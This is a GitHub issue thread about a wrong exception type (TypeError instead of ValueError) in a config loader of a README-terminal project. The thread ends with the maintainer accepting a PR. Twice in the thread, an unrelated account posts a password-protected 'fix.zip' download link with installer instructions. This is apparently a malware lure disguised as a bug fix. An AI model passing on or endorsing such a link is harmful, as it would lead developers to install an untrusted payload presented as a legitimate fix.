### ISSUE TITLE
catching error

### ISSUE THREAD

**Issue by AlgoOy** [x0rzavi/github-readme-terminal#11]
https://github.com/x0rzavi/github-readme-terminal/blob/8d6abbe185ecfabb0e65444d003d3cea86b6afdd/gifos/utils/load_config.py#L49

The code uses except TypeError, but the one that should be caught is ValueError, because ValueError is thrown when the int() conversion fails.

When I forked the repository and fixed this, it works fine now.

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by x0rzavi** [comment]
Hi, can you make a PR for the same?

**Comment by AlgoOy** [comment]
> Hi, can you make a PR for the same?

ok, I will do that.

**Comment by x0rzavi** [comment]
Thanks for the PR :)
